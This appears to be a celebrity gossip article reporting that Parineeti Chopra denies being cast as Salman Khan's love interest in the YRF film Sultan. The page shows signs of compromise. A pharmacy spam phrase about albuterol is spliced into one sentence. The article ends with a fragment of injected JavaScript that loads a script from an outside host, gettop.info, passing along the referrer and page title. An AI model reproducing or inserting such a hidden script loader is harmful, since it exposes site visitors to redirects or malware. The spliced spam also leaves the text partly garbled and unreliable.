Recent rumours suggested that Parineeti Chopra, last seen in Kill Dill, was approached to play Salman Khan’s love interest in the much talked about YRF production Sultan. The lady has now clarified that this isn’t true.
Sultan has been a favourite of tabloids since it was announced, mostly because the makers have not been able to find a leading lady. After Deepika Padukone and Anushka Sharma turned down the role, Kangana Ranaut was approached. She couldn’t say yes due to a clash of dates.
Last we had heard that Aditya Chopra has managed to convince Pari to come onboard (and we were excited) but that hasn’t happened either. Is the fate of Ali Abbas Zafar’s substitute for albuterol for sale Sultan hanging in the balance? We hope not!
For Parineeti, who needs to revive her Bollywood career, a Yash Raj Productions film opposite Salman would have been a golden opportunity. And we all know that Pari is a good actress. It would’ve been a win-win for everyone.
While we wait for an official announcement on the film’s female lead, here’s what we know – Salman will play a wrestler in Sultan and the film is slated for a 2016 release.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);
